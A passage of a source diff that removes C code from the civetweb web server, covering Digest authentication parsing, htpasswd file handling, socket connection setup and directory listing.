-#ifdef DEBUG
-				/* Don't use mg_cry here, but only a trace, since this is
-				 * a typical case. It will occur for every directory
-				 * without a password file. */
-				DEBUG_TRACE("fopen(%s): %s", name, strerror(ERRNO));
-#endif
-			}
-		} else {
-			/* Try to find .htpasswd in requested directory. */
-			for (p = path, e = p + strlen(p) - 1; e > p; e--) {
-				if (e[0] == '/') {
-					break;
-				}
-			}
-			mg_snprintf(conn,
-			            &truncated,
-			            name,
-			            sizeof(name),
-			            "%.*s/%s",
-			            (int)(e - p),
-			            p,
-			            PASSWORDS_FILE_NAME);
-
-			if (truncated || !mg_fopen(conn, name, MG_FOPEN_MODE_READ, filep)) {
-#ifdef DEBUG
-				/* Don't use mg_cry here, but only a trace, since this is
-				 * a typical case. It will occur for every directory
-				 * without a password file. */
-				DEBUG_TRACE("fopen(%s): %s", name, strerror(ERRNO));
-#endif
-			}
-		}
-	}
-}
-
-
-/* Parsed Authorization header */
-struct ah {
-	char *user, *uri, *cnonce, *response, *qop, *nc, *nonce;
-};
-
-
-/* Return 1 on success. Always initializes the ah structure. */
-static int
-parse_auth_header(struct mg_connection *conn,
-                  char *buf,
-                  size_t buf_size,
-                  struct ah *ah)
-{
-	char *name, *value, *s;
-	const char *auth_header;
-	uint64_t nonce;
-
-	if (!ah || !conn) {
-		return 0;
-	}
-
-	(void)memset(ah, 0, sizeof(*ah));
-	if (((auth_header = mg_get_header(conn, "Authorization")) == NULL)
-	    || mg_strncasecmp(auth_header, "Digest ", 7) != 0) {
-		return 0;
-	}
-
-	/* Make modifiable copy of the auth header */
-	(void)mg_strlcpy(buf, auth_header + 7, buf_size);
-	s = buf;
-
-	/* Parse authorization header */
-	for (;;) {
-		/* Gobble initial spaces */
-		while (isspace(*(unsigned char *)s)) {
-			s++;
-		}
-		name = skip_quoted(&s, "=", " ", 0);
-		/* Value is either quote-delimited, or ends at first comma or space.
-		 */
-		if (s[0] == '\"') {
-			s++;
-			value = skip_quoted(&s, "\"", " ", '\\');
-			if (s[0] == ',') {
-				s++;
-			}
-		} else {
-			value = skip_quoted(&s, ", ", " ", 0); /* IE uses commas, FF uses
-			                                        * spaces */
-		}
-		if (*name == '\0') {
-			break;
-		}
-
-		if (!strcmp(name, "username")) {
-			ah->user = value;
-		} else if (!strcmp(name, "cnonce")) {
-			ah->cnonce = value;
-		} else if (!strcmp(name, "response")) {
-			ah->response = value;
-		} else if (!strcmp(name, "uri")) {
-			ah->uri = value;
-		} else if (!strcmp(name, "qop")) {
-			ah->qop = value;
-		} else if (!strcmp(name, "nc")) {
-			ah->nc = value;
-		} else if (!strcmp(name, "nonce")) {
-			ah->nonce = value;
-		}
-	}
-
-#ifndef NO_NONCE_CHECK
-	/* Read the nonce from the response. */
-	if (ah->nonce == NULL) {
-		return 0;
-	}
-	s = NULL;
-	nonce = strtoull(ah->nonce, &s, 10);
-	if ((s == NULL) || (*s != 0)) {
-		return 0;
-	}
-
-	/* Convert the nonce from the client to a number. */
-	nonce ^= conn->ctx->auth_nonce_mask;
-
-	/* The converted number corresponds to the time the nounce has been
-	 * created. This should not be earlier than the server start. */
-	/* Server side nonce check is valuable in all situations but one:
-	 * if the server restarts frequently, but the client should not see
-	 * that, so the server should accept nonces from previous starts. */
-	/* However, the reasonable default is to not accept a nonce from a
-	 * previous start, so if anyone changed the access rights between
-	 * two restarts, a new login is required. */
-	if (nonce < (uint64_t)conn->ctx->start_time) {
-		/* nonce is from a previous start of the server and no longer valid
-		 * (replay attack?) */
-		return 0;
-	}
-	/* Check if the nonce is too high, so it has not (yet) been used by the
-	 * server. */
-	if (nonce >= ((uint64_t)conn->ctx->start_time + conn->ctx->nonce_count)) {
-		return 0;
-	}
-#else
-	(void)nonce;
-#endif
-
-	/* CGI needs it as REMOTE_USER */
-	if (ah->user != NULL) {
-		conn->request_info.remote_user = mg_strdup(ah->user);
-	} else {
-		return 0;
-	}
-
-	return 1;
-}
-
-
-static const char *
-mg_fgets(char *buf, size_t size, struct mg_file *filep, char **p)
-{
-	const char *eof;
-	size_t len;
-	const char *memend;
-
-	if (!filep) {
-		return NULL;
-	}
-
-	if ((filep->access.membuf != NULL) && (*p != NULL)) {
-		memend = (const char *)&filep->access.membuf[filep->stat.size];
-		/* Search for \n from p till the end of stream */
-		eof = (char *)memchr(*p, '\n', (size_t)(memend - *p));
-		if (eof != NULL) {
-			eof += 1; /* Include \n */
-		} else {
-			eof = memend; /* Copy remaining data */
-		}
-		len =
-		    ((size_t)(eof - *p) > (size - 1)) ? (size - 1) : (size_t)(eof - *p);
-		memcpy(buf, *p, len);
-		buf[len] = '\0';
-		*p += len;
-		return len ? eof : NULL;
-	} else if (filep->access.fp != NULL) {
-		return fgets(buf, (int)size, filep->access.fp);
-	} else {
-		return NULL;
-	}
-}
-
-/* Define the initial recursion depth for procesesing htpasswd files that
- * include other htpasswd
- * (or even the same) files.  It is not difficult to provide a file or files
- * s.t. they force civetweb
- * to infinitely recurse and then crash.
- */
-#define INITIAL_DEPTH 9
-#if INITIAL_DEPTH <= 0
-#error Bad INITIAL_DEPTH for recursion, set to at least 1
-#endif
-
-struct read_auth_file_struct {
-	struct mg_connection *conn;
-	struct ah ah;
-	const char *domain;
-	char buf[256 + 256 + 40];
-	const char *f_user;
-	const char *f_domain;
-	const char *f_ha1;
-};
-
-
-static int
-read_auth_file(struct mg_file *filep,
-               struct read_auth_file_struct *workdata,
-               int depth)
-{
-	char *p;
-	int is_authorized = 0;
-	struct mg_file fp;
-	size_t l;
-
-	if (!filep || !workdata || (0 == depth)) {
-		return 0;
-	}
-
-	/* Loop over passwords file */
-	p = (char *)filep->access.membuf;
-	while (mg_fgets(workdata->buf, sizeof(workdata->buf), filep, &p) != NULL) {
-		l = strlen(workdata->buf);
-		while (l > 0) {
-			if (isspace(workdata->buf[l - 1])
-			    || iscntrl(workdata->buf[l - 1])) {
-				l--;
-				workdata->buf[l] = 0;
-			} else
-				break;
-		}
-		if (l < 1) {
-			continue;
-		}
-
-		workdata->f_user = workdata->buf;
-
-		if (workdata->f_user[0] == ':') {
-			/* user names may not contain a ':' and may not be empty,
-			 * so lines starting with ':' may be used for a special purpose
-			 */
-			if (workdata->f_user[1] == '#') {
-				/* :# is a comment */
-				continue;
-			} else if (!strncmp(workdata->f_user + 1, "include=", 8)) {
-				if (mg_fopen(workdata->conn,
-				             workdata->f_user + 9,
-				             MG_FOPEN_MODE_READ,
-				             &fp)) {
-					is_authorized = read_auth_file(&fp, workdata, depth - 1);
-					(void)mg_fclose(
-					    &fp.access); /* ignore error on read only file */
-
-					/* No need to continue processing files once we have a
-					 * match, since nothing will reset it back
-					 * to 0.
-					 */
-					if (is_authorized) {
-						return is_authorized;
-					}
-				} else {
-					mg_cry(workdata->conn,
-					       "%s: cannot open authorization file: %s",
-					       __func__,
-					       workdata->buf);
-				}
-				continue;
-			}
-			/* everything is invalid for the moment (might change in the
-			 * future) */
-			mg_cry(workdata->conn,
-			       "%s: syntax error in authorization file: %s",
-			       __func__,
-			       workdata->buf);
-			continue;
-		}
-
-		workdata->f_domain = strchr(workdata->f_user, ':');
-		if (workdata->f_domain == NULL) {
-			mg_cry(workdata->conn,
-			       "%s: syntax error in authorization file: %s",
-			       __func__,
-			       workdata->buf);
-			continue;
-		}
-		*(char *)(workdata->f_domain) = 0;
-		(workdata->f_domain)++;
-
-		workdata->f_ha1 = strchr(workdata->f_domain, ':');
-		if (workdata->f_ha1 == NULL) {
-			mg_cry(workdata->conn,
-			       "%s: syntax error in authorization file: %s",
-			       __func__,
-			       workdata->buf);
-			continue;
-		}
-		*(char *)(workdata->f_ha1) = 0;
-		(workdata->f_ha1)++;
-
-		if (!strcmp(workdata->ah.user, workdata->f_user)
-		    && !strcmp(workdata->domain, workdata->f_domain)) {
-			return check_password(workdata->conn->request_info.request_method,
-			                      workdata->f_ha1,
-			                      workdata->ah.uri,
-			                      workdata->ah.nonce,
-			                      workdata->ah.nc,
-			                      workdata->ah.cnonce,
-			                      workdata->ah.qop,
-			                      workdata->ah.response);
-		}
-	}
-
-	return is_authorized;
-}
-
-
-/* Authorize against the opened passwords file. Return 1 if authorized. */
-static int
-authorize(struct mg_connection *conn, struct mg_file *filep, const char *realm)
-{
-	struct read_auth_file_struct workdata;
-	char buf[MG_BUF_LEN];
-
-	if (!conn || !conn->ctx) {
-		return 0;
-	}
-
-	memset(&workdata, 0, sizeof(workdata));
-	workdata.conn = conn;
-
-	if (!parse_auth_header(conn, buf, sizeof(buf), &workdata.ah)) {
-		return 0;
-	}
-
-	if (realm) {
-		workdata.domain = realm;
-	} else {
-		workdata.domain = conn->ctx->config[AUTHENTICATION_DOMAIN];
-	}
-
-	return read_auth_file(filep, &workdata, INITIAL_DEPTH);
-}
-
-
-/* Public function to check http digest authentication header */
-int
-mg_check_digest_access_authentication(struct mg_connection *conn,
-                                      const char *realm,
-                                      const char *filename)
-{
-	struct mg_file file = STRUCT_FILE_INITIALIZER;
-	int auth;
-
-	if (!conn || !filename) {
-		return -1;
-	}
-	if (!mg_fopen(conn, filename, MG_FOPEN_MODE_READ, &file)) {
-		return -2;
-	}
-
-	auth = authorize(conn, &file, realm);
-
-	mg_fclose(&file.access);
-
-	return auth;
-}
-
-
-/* Return 1 if request is authorised, 0 otherwise. */
-static int
-check_authorization(struct mg_connection *conn, const char *path)
-{
-	char fname[PATH_MAX];
-	struct vec uri_vec, filename_vec;
-	const char *list;
-	struct mg_file file = STRUCT_FILE_INITIALIZER;
-	int authorized = 1, truncated;
-
-	if (!conn || !conn->ctx) {
-		return 0;
-	}
-
-	list = conn->ctx->config[PROTECT_URI];
-	while ((list = next_option(list, &uri_vec, &filename_vec)) != NULL) {
-		if (!memcmp(conn->request_info.local_uri, uri_vec.ptr, uri_vec.len)) {
-			mg_snprintf(conn,
-			            &truncated,
-			            fname,
-			            sizeof(fname),
-			            "%.*s",
-			            (int)filename_vec.len,
-			            filename_vec.ptr);
-
-			if (truncated
-			    || !mg_fopen(conn, fname, MG_FOPEN_MODE_READ, &file)) {
-				mg_cry(conn,
-				       "%s: cannot open %s: %s",
-				       __func__,
-				       fname,
-				       strerror(errno));
-			}
-			break;
-		}
-	}
-
-	if (!is_file_opened(&file.access)) {
-		open_auth_file(conn, path, &file);
-	}
-
-	if (is_file_opened(&file.access)) {
-		authorized = authorize(conn, &file, NULL);
-		(void)mg_fclose(&file.access); /* ignore error on read only file */
-	}
-
-	return authorized;
-}
-
-
-/* Internal function. Assumes conn is valid */
-static void
-send_authorization_request(struct mg_connection *conn, const char *realm)
-{
-	char date[64];
-	time_t curtime = time(NULL);
-	uint64_t nonce = (uint64_t)(conn->ctx->start_time);
-
-	if (!realm) {
-		realm = conn->ctx->config[AUTHENTICATION_DOMAIN];
-	}
-
-	(void)pthread_mutex_lock(&conn->ctx->nonce_mutex);
-	nonce += conn->ctx->nonce_count;
-	++conn->ctx->nonce_count;
-	(void)pthread_mutex_unlock(&conn->ctx->nonce_mutex);
-
-	nonce ^= conn->ctx->auth_nonce_mask;
-	conn->status_code = 401;
-	conn->must_close = 1;
-
-	gmt_time_string(date, sizeof(date), &curtime);
-
-	mg_printf(conn, "HTTP/1.1 401 Unauthorized\r\n");
-	send_no_cache_header(conn);
-	send_additional_header(conn);
-	mg_printf(conn,
-	          "Date: %s\r\n"
-	          "Connection: %s\r\n"
-	          "Content-Length: 0\r\n"
-	          "WWW-Authenticate: Digest qop=\"auth\", realm=\"%s\", "
-	          "nonce=\"%" UINT64_FMT "\"\r\n\r\n",
-	          date,
-	          suggest_connection_header(conn),
-	          realm,
-	          nonce);
-}
-
-
-/* Interface function. Parameters are provided by the user, so do
- * at least some basic checks.
- */
-int
-mg_send_digest_access_authentication_request(struct mg_connection *conn,
-                                             const char *realm)
-{
-	if (conn && conn->ctx) {
-		send_authorization_request(conn, realm);
-		return 0;
-	}
-	return -1;
-}
-
-
-#if !defined(NO_FILES)
-static int
-is_authorized_for_put(struct mg_connection *conn)
-{
-	if (conn) {
-		struct mg_file file = STRUCT_FILE_INITIALIZER;
-		const char *passfile = conn->ctx->config[PUT_DELETE_PASSWORDS_FILE];
-		int ret = 0;
-
-		if (passfile != NULL
-		    && mg_fopen(conn, passfile, MG_FOPEN_MODE_READ, &file)) {
-			ret = authorize(conn, &file, NULL);
-			(void)mg_fclose(&file.access); /* ignore error on read only file */
-		}
-
-		return ret;
-	}
-	return 0;
-}
-#endif
-
-
-int
-mg_modify_passwords_file(const char *fname,
-                         const char *domain,
-                         const char *user,
-                         const char *pass)
-{
-	int found, i;
-	char line[512], u[512] = "", d[512] = "", ha1[33], tmp[PATH_MAX + 8];
-	FILE *fp, *fp2;
-
-	found = 0;
-	fp = fp2 = NULL;
-
-	/* Regard empty password as no password - remove user record. */
-	if ((pass != NULL) && (pass[0] == '\0')) {
-		pass = NULL;
-	}
-
-	/* Other arguments must not be empty */
-	if ((fname == NULL) || (domain == NULL) || (user == NULL)) {
-		return 0;
-	}
-
-	/* Using the given file format, user name and domain must not contain
-	 * ':'
-	 */
-	if (strchr(user, ':') != NULL) {
-		return 0;
-	}
-	if (strchr(domain, ':') != NULL) {
-		return 0;
-	}
-
-	/* Do not allow control characters like newline in user name and domain.
-	 * Do not allow excessively long names either. */
-	for (i = 0; ((i < 255) && (user[i] != 0)); i++) {
-		if (iscntrl(user[i])) {
-			return 0;
-		}
-	}
-	if (user[i]) {
-		return 0;
-	}
-	for (i = 0; ((i < 255) && (domain[i] != 0)); i++) {
-		if (iscntrl(domain[i])) {
-			return 0;
-		}
-	}
-	if (domain[i]) {
-		return 0;
-	}
-
-	/* The maximum length of the path to the password file is limited */
-	if ((strlen(fname) + 4) >= PATH_MAX) {
-		return 0;
-	}
-
-	/* Create a temporary file name. Length has been checked before. */
-	strcpy(tmp, fname);
-	strcat(tmp, ".tmp");
-
-	/* Create the file if does not exist */
-	/* Use of fopen here is OK, since fname is only ASCII */
-	if ((fp = fopen(fname, "a+")) != NULL) {
-		(void)fclose(fp);
-	}
-
-	/* Open the given file and temporary file */
-	if ((fp = fopen(fname, "r")) == NULL) {
-		return 0;
-	} else if ((fp2 = fopen(tmp, "w+")) == NULL) {
-		fclose(fp);
-		return 0;
-	}
-
-	/* Copy the stuff to temporary file */
-	while (fgets(line, sizeof(line), fp) != NULL) {
-		if (sscanf(line, "%255[^:]:%255[^:]:%*s", u, d) != 2) {
-			continue;
-		}
-		u[255] = 0;
-		d[255] = 0;
-
-		if (!strcmp(u, user) && !strcmp(d, domain)) {
-			found++;
-			if (pass != NULL) {
-				mg_md5(ha1, user, ":", domain, ":", pass, NULL);
-				fprintf(fp2, "%s:%s:%s\n", user, domain, ha1);
-			}
-		} else {
-			fprintf(fp2, "%s", line);
-		}
-	}
-
-	/* If new user, just add it */
-	if (!found && (pass != NULL)) {
-		mg_md5(ha1, user, ":", domain, ":", pass, NULL);
-		fprintf(fp2, "%s:%s:%s\n", user, domain, ha1);
-	}
-
-	/* Close files */
-	fclose(fp);
-	fclose(fp2);
-
-	/* Put the temp file in place of real file */
-	IGNORE_UNUSED_RESULT(remove(fname));
-	IGNORE_UNUSED_RESULT(rename(tmp, fname));
-
-	return 1;
-}
-
-
-static int
-is_valid_port(unsigned long port)
-{
-	return (port <= 0xffff);
-}
-
-
-static int
-mg_inet_pton(int af, const char *src, void *dst, size_t dstlen)
-{
-	struct addrinfo hints, *res, *ressave;
-	int func_ret = 0;
-	int gai_ret;
-
-	memset(&hints, 0, sizeof(struct addrinfo));
-	hints.ai_family = af;
-
-	gai_ret = getaddrinfo(src, NULL, &hints, &res);
-	if (gai_ret != 0) {
-		/* gai_strerror could be used to convert gai_ret to a string */
-		/* POSIX return values: see
-		 * http://pubs.opengroup.org/onlinepubs/9699919799/functions/freeaddrinfo.html
-		 */
-		/* Windows return values: see
-		 * https://msdn.microsoft.com/en-us/library/windows/desktop/ms738520%28v=vs.85%29.aspx
-		 */
-		return 0;
-	}
-
-	ressave = res;
-
-	while (res) {
-		if (dstlen >= (size_t)res->ai_addrlen) {
-			memcpy(dst, res->ai_addr, res->ai_addrlen);
-			func_ret = 1;
-		}
-		res = res->ai_next;
-	}
-
-	freeaddrinfo(ressave);
-	return func_ret;
-}
-
-
-static int
-connect_socket(struct mg_context *ctx /* may be NULL */,
-               const char *host,
-               int port,
-               int use_ssl,
-               char *ebuf,
-               size_t ebuf_len,
-               SOCKET *sock /* output: socket, must not be NULL */,
-               union usa *sa /* output: socket address, must not be NULL  */
-               )
-{
-	int ip_ver = 0;
-	*sock = INVALID_SOCKET;
-	memset(sa, 0, sizeof(*sa));
-
-	if (ebuf_len > 0) {
-		*ebuf = 0;
-	}
-
-	if (host == NULL) {
-		mg_snprintf(NULL,
-		            NULL, /* No truncation check for ebuf */
-		            ebuf,
-		            ebuf_len,
-		            "%s",
-		            "NULL host");
-		return 0;
-	}
-
-	if ((port <= 0) || !is_valid_port((unsigned)port)) {
-		mg_snprintf(NULL,
-		            NULL, /* No truncation check for ebuf */
-		            ebuf,
-		            ebuf_len,
-		            "%s",
-		            "invalid port");
-		return 0;
-	}
-
-#if !defined(NO_SSL)
-#if !defined(NO_SSL_DL)
-#ifdef OPENSSL_API_1_1
-	if (use_ssl && (TLS_client_method == NULL)) {
-		mg_snprintf(NULL,
-		            NULL, /* No truncation check for ebuf */
-		            ebuf,
-		            ebuf_len,
-		            "%s",
-		            "SSL is not initialized");
-		return 0;
-	}
-#else
-	if (use_ssl && (SSLv23_client_method == NULL)) {
-		mg_snprintf(NULL,
-		            NULL, /* No truncation check for ebuf */
-		            ebuf,
-		            ebuf_len,
-		            "%s",
-		            "SSL is not initialized");
-		return 0;
-	}
-
-#endif /* OPENSSL_API_1_1 */
-#else
-	(void)use_ssl;
-#endif /* NO_SSL_DL */
-#else
-	(void)use_ssl;
-#endif /* !defined(NO_SSL) */
-
-	if (mg_inet_pton(AF_INET, host, &sa->sin, sizeof(sa->sin))) {
-		sa->sin.sin_family = AF_INET;
-		sa->sin.sin_port = htons((uint16_t)port);
-		ip_ver = 4;
-#ifdef USE_IPV6
-	} else if (mg_inet_pton(AF_INET6, host, &sa->sin6, sizeof(sa->sin6))) {
-		sa->sin6.sin6_family = AF_INET6;
-		sa->sin6.sin6_port = htons((uint16_t)port);
-		ip_ver = 6;
-	} else if (host[0] == '[') {
-		/* While getaddrinfo on Windows will work with [::1],
-		 * getaddrinfo on Linux only works with ::1 (without []). */
-		size_t l = strlen(host + 1);
-		char *h = (l > 1) ? mg_strdup(host + 1) : NULL;
-		if (h) {
-			h[l - 1] = 0;
-			if (mg_inet_pton(AF_INET6, h, &sa->sin6, sizeof(sa->sin6))) {
-				sa->sin6.sin6_family = AF_INET6;
-				sa->sin6.sin6_port = htons((uint16_t)port);
-				ip_ver = 6;
-			}
-			mg_free(h);
-		}
-#endif
-	}
-
-	if (ip_ver == 0) {
-		mg_snprintf(NULL,
-		            NULL, /* No truncation check for ebuf */
-		            ebuf,
-		            ebuf_len,
-		            "%s",
-		            "host not found");
-		return 0;
-	}
-
-	if (ip_ver == 4) {
-		*sock = socket(PF_INET, SOCK_STREAM, 0);
-	}
-#ifdef USE_IPV6
-	else if (ip_ver == 6) {
-		*sock = socket(PF_INET6, SOCK_STREAM, 0);
-	}
-#endif
-
-	if (*sock == INVALID_SOCKET) {
-		mg_snprintf(NULL,
-		            NULL, /* No truncation check for ebuf */
-		            ebuf,
-		            ebuf_len,
-		            "socket(): %s",
-		            strerror(ERRNO));
-		return 0;
-	}
-
-	set_close_on_exec(*sock, fc(ctx));
-
-	if ((ip_ver == 4)
-	    && (connect(*sock, (struct sockaddr *)&sa->sin, sizeof(sa->sin))
-	        == 0)) {
-		/* connected with IPv4 */
-		if (0 == set_non_blocking_mode(*sock)) {
-			/* Ok */
-			return 1;
-		}
-		/* failed */
-		/* TODO: specific error message */
-	}
-
-#ifdef USE_IPV6
-	if ((ip_ver == 6)
-	    && (connect(*sock, (struct sockaddr *)&sa->sin6, sizeof(sa->sin6))
-	        == 0)) {
-		/* connected with IPv6 */
-		if (0 == set_non_blocking_mode(*sock)) {
-			/* Ok */
-			return 1;
-		}
-		/* failed */
-		/* TODO: specific error message */
-	}
-#endif
-
-	/* Not connected */
-	mg_snprintf(NULL,
-	            NULL, /* No truncation check for ebuf */
-	            ebuf,
-	            ebuf_len,
-	            "connect(%s:%d): %s",
-	            host,
-	            port,
-	            strerror(ERRNO));
-	closesocket(*sock);
-	*sock = INVALID_SOCKET;
-
-	return 0;
-}
-
-
-int
-mg_url_encode(const char *src, char *dst, size_t dst_len)
-{
-	static const char *dont_escape = "._-$,;~()";
-	static const char *hex = "0123456789abcdef";
-	char *pos = dst;
-	const char *end = dst + dst_len - 1;
-
-	for (; ((*src != '\0') && (pos < end)); src++, pos++) {
-		if (isalnum(*(const unsigned char *)src)
-		    || (strchr(dont_escape, *(const unsigned char *)src) != NULL)) {
-			*pos = *src;
-		} else if (pos + 2 < end) {
-			pos[0] = '%';
-			pos[1] = hex[(*(const unsigned char *)src) >> 4];
-			pos[2] = hex[(*(const unsigned char *)src) & 0xf];
-			pos += 2;
-		} else {
-			break;
-		}
-	}
-
-	*pos = '\0';
-	return (*src == '\0') ? (int)(pos - dst) : -1;
-}
-
-/* Return 0 on success, non-zero if an error occurs. */
-
-static int
-print_dir_entry(struct de *de)
-{
-	size_t hrefsize;
-	char *href;
-	char size[64], mod[64];
-	struct tm *tm;
-
-	hrefsize = PATH_MAX * 3; /* worst case */
-	href = (char *)mg_malloc(hrefsize);
-	if (href == NULL) {
-		return -1;
-	}
-	if (de->file.is_directory) {
-		mg_snprintf(de->conn,
-		            NULL, /* Buffer is big enough */
-		            size,
-		            sizeof(size),
-		            "%s",
-		            "[DIRECTORY]");
-	} else {
-		/* We use (signed) cast below because MSVC 6 compiler cannot
-		 * convert unsigned __int64 to double. Sigh. */
-		if (de->file.size < 1024) {
-			mg_snprintf(de->conn,
-			            NULL, /* Buffer is big enough */
-			            size,
-			            sizeof(size),
-			            "%d",
-			            (int)de->file.size);
-		} else if (de->file.size < 0x100000) {
-			mg_snprintf(de->conn,
-			            NULL, /* Buffer is big enough */
-			            size,
-			            sizeof(size),
-			            "%.1fk",
-			            (double)de->file.size / 1024.0);
-		} else if (de->file.size < 0x40000000) {
-			mg_snprintf(de->conn,
-			            NULL, /* Buffer is big enough */
-			            size,
-			            sizeof(size),
-			            "%.1fM",
-			            (double)de->file.size / 1048576);
-		} else {
-			mg_snprintf(de->conn,
-			            NULL, /* Buffer is big enough */
-			            size,
-			            sizeof(size),
-			            "%.1fG",
-			            (double)de->file.size / 1073741824);
-		}
-	}
-
-	/* Note: mg_snprintf will not cause a buffer overflow above.
-	 * So, string truncation checks are not required here. */
-
-	tm = localtime(&de->file.last_modified);
-	if (tm != NULL) {
-		strftime(mod, sizeof(mod), "%d-%b-%Y %H:%M", tm);
-	} else {
-		mg_strlcpy(mod, "01-Jan-1970 00:00", sizeof(mod));
-		mod[sizeof(mod) - 1] = '\0';
-	}
-	mg_url_encode(de->file_name, href, hrefsize);
-	mg_printf(de->conn,
-	          "<tr><td><a href=\"%s%s%s\">%s%s</a></td>"
-	          "<td>&nbsp;%s</td><td>&nbsp;&nbsp;%s</td></tr>\n",
-	          de->conn->request_info.local_uri,
-	          href,
-	          de->file.is_directory ? "/" : "",
-	          de->file_name,
-	          de->file.is_directory ? "/" : "",
-	          mod,
-	          size);
-	mg_free(href);
-	return 0;
-}
-
-
-/* This function is called from send_directory() and used for
- * sorting directory entries by size, or name, or modification time.
- * On windows, __cdecl specification is needed in case if project is built
- * with __stdcall convention. qsort always requires __cdels callback. */
-static int WINCDECL
-compare_dir_entries(const void *p1, const void *p2)
-{
-	if (p1 && p2) {
-		const struct de *a = (const struct de *)p1, *b = (const struct de *)p2;
-		const char *query_string = a->conn->request_info.query_string;
-		int cmp_result = 0;
-
-		if (query_string == NULL) {
-			query_string = "na";
-		}
-
-		if (a->file.is_directory && !b->file.is_directory) {
-			return -1; /* Always put directories on top */
-		} else if (!a->file.is_directory && b->file.is_directory) {
-			return 1; /* Always put directories on top */
-		} else if (*query_string == 'n') {
-			cmp_result = strcmp(a->file_name, b->file_name);
-		} else if (*query_string == 's') {
-			cmp_result = (a->file.size == b->file.size)
-			                 ? 0
-			                 : ((a->file.size > b->file.size) ? 1 : -1);
-		} else if (*query_string == 'd') {
-			cmp_result =
-			    (a->file.last_modified == b->file.last_modified)
-			        ? 0
-			        : ((a->file.last_modified > b->file.last_modified) ? 1
-			                                                           : -1);
-		}
-
-		return (query_string[1] == 'd') ? -cmp_result : cmp_result;
-	}
-	return 0;
-}
-
-
-static int
-must_hide_file(struct mg_connection *conn, const char *path)
-{
-	if (conn && conn->ctx) {
-		const char *pw_pattern = "**" PASSWORDS_FILE_NAME "$";
-		const char *pattern = conn->ctx->config[HIDE_FILES];
-		return (match_prefix(pw_pattern, strlen(pw_pattern), path) > 0)
-		       || ((pattern != NULL)
-		           && (match_prefix(pattern, strlen(pattern), path) > 0));
-	}
-	return 0;
-}
-
-
-static int
-scan_directory(struct mg_connection *conn,
-               const char *dir,
-               void *data,
-               int (*cb)(struct de *, void *))
-{
-	char path[PATH_MAX];
-	struct dirent *dp;
-	DIR *dirp;
-	struct de de;
-	int truncated;
-
-	if ((dirp = mg_opendir(conn, dir)) == NULL) {
-		return 0;
-	} else {
-		de.conn = conn;
-
-		while ((dp = mg_readdir(dirp)) != NULL) {
-			/* Do not show current dir and hidden files */
-			if (!strcmp(dp->d_name, ".") || !strcmp(dp->d_name, "..")
-			    || must_hide_file(conn, dp->d_name)) {
-				continue;
-			}
-
-			mg_snprintf(
-			    conn, &truncated, path, sizeof(path), "%s/%s", dir, dp->d_name);
-
-			/* If we don't memset stat structure to zero, mtime will have
-			 * garbage and strftime() will segfault later on in
-			 * print_dir_entry(). memset is required only if mg_stat()
-			 * fails. For more details, see
-			 * http://code.google.com/p/mongoose/issues/detail?id=79 */
-			memset(&de.file, 0, sizeof(de.file));
-
-			if (truncated) {
-				/* If the path is not complete, skip processing. */
-				continue;
-			}
-
-			if (!mg_stat(conn, path, &de.file)) {
-				mg_cry(conn,
-				       "%s: mg_stat(%s) failed: %s",
-				       __func__,
-				       path,
-				       strerror(ERRNO));
-			}
-			de.file_name = dp->d_name;
-			cb(&de, data);
-		}
-		(void)mg_closedir(dirp);
-	}
-	return 1;
-}
-
-
-#if !defined(NO_FILES)
-static int
-remove_directory(struct mg_connection *conn, const char *dir)
-{
-	char path[PATH_MAX];
-	struct dirent *dp;
-	DIR *dirp;
-	struct de de;
-	int truncated;
-	int ok = 1;
-
-	if ((dirp = mg_opendir(conn, dir)) == NULL) {
-		return 0;
-	} else {
-		de.conn = conn;
-
-		while ((dp = mg_readdir(dirp)) != NULL) {
-			/* Do not show current dir (but show hidden files as they will
-			 * also be removed) */
-			if (!strcmp(dp->d_name, ".") || !strcmp(dp->d_name, "..")) {
-				continue;
-			}
-
-			mg_snprintf(
-			    conn, &truncated, path, sizeof(path), "%s/%s", dir, dp->d_name);
-
-			/* If we don't memset stat structure to zero, mtime will have
-			 * garbage and strftime() will segfault later on in
-			 * print_dir_entry(). memset is required only if mg_stat()
-			 * fails. For more details, see
-			 * http://code.google.com/p/mongoose/issues/detail?id=79 */
-			memset(&de.file, 0, sizeof(de.file));
-
-			if (truncated) {
-				/* Do not delete anything shorter */
-				ok = 0;
-				continue;
-			}
-
-			if (!mg_stat(conn, path, &de.file)) {
-				mg_cry(conn,
-				       "%s: mg_stat(%s) failed: %s",
-				       __func__,
-				       path,
-				       strerror(ERRNO));
-				ok = 0;
-			}
-
-			if (de.file.is_directory) {
-				if (remove_directory(conn, path) == 0) {
-					ok = 0;
-				}
-			} else {
-				/* This will fail file is the file is in memory */
-				if (mg_remove(conn, path) == 0) {
-					ok = 0;
-				}
-			}
-		}
-		(void)mg_closedir(dirp);
-
-		IGNORE_UNUSED_RESULT(rmdir(dir));
-	}
-
-	return ok;
-}
-#endif
-
-
-struct dir_scan_data {
-	struct de *entries;
-	unsigned int num_entries;
-	unsigned int arr_size;
-};
-
-
-/* Behaves like realloc(), but frees original pointer on failure */
-static void *
-realloc2(void *ptr, size_t size)
-{
-	void *new_ptr = mg_realloc(ptr, size);
-	if (new_ptr == NULL) {
-		mg_free(ptr);
-	}
-	return new_ptr;
-}
-
-
-static int
-dir_scan_callback(struct de *de, void *data)
-{
-	struct dir_scan_data *dsd = (struct dir_scan_data *)data;
-
-	if ((dsd->entries == NULL) || (dsd->num_entries >= dsd->arr_size)) {
-		dsd->arr_size *= 2;
-		dsd->entries =
-		    (struct de *)realloc2(dsd->entries,
-		                          dsd->arr_size * sizeof(dsd->entries[0]));
-	}
-	if (dsd->entries == NULL) {
-		/* TODO(lsm, low): propagate an error to the caller */
-		dsd->num_entries = 0;
-	} else {
-		dsd->entries[dsd->num_entries].file_name = mg_strdup(de->file_name);
-		dsd->entries[dsd->num_entries].file = de->file;
-		dsd->entries[dsd->num_entries].conn = de->conn;
-		dsd->num_entries++;
-	}
-
-	return 0;
-}
-
-
-static void
-handle_directory_request(struct mg_connection *conn, const char *dir)
-{
-	unsigned int i;
-	int sort_direction;
-	struct dir_scan_data data = {NULL, 0, 128};
-	char date[64];
-	time_t curtime = time(NULL);
-
-	if (!scan_directory(conn, dir, &data, dir_scan_callback)) {
-		mg_send_http_error(conn,
-		                   500,
-		                   "Error: Cannot open directory\nopendir(%s): %s",
-		                   dir,
-		                   strerror(ERRNO));
-		return;
-	}
-
-	gmt_time_string(date, sizeof(date), &curtime);
-
-	if (!conn) {
-		return;
-	}
-
-	sort_direction = ((conn->request_info.query_string != NULL)
-	                  && (conn->request_info.query_string[1] == 'd'))
-	                     ? 'a'
-	                     : 'd';
-
